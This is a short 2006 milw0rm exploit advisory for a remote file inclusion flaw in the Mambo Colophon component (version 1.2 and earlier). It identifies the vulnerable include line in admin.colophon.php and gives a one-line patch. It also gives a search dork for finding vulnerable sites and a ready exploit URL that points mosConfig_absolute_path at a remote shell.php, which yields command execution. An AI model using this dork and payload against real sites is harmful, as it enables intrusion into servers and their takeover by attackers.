23 lines
No EOL
614 B
Text
23 lines
No EOL
614 B
Text
########### Command Mambo Colophon =<1.2 ##by #Drago84#########
|
|
|
|
Found By Drago84
|
|
Exclusive Security Italian Security
|
|
|
|
This bug allows a remote atacker to execute commands via rfi
|
|
|
|
page:
|
|
admin.colophon.php
|
|
|
|
bug:
|
|
require_once("$mosConfig_absolute_path/components/com_colophon/language/$mosConfig_lang.php");
|
|
|
|
path:
|
|
add in admin.colophon.php
|
|
defined( '_VALID_MOS' ) or die( 'hacking attemp.' );
|
|
|
|
dork: inurl:com_colophon
|
|
|
|
expl:
|
|
htttp:/www.site.it/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://evalsite/shell.php?
|
|
|
|
# milw0rm.com [2006-07-29] |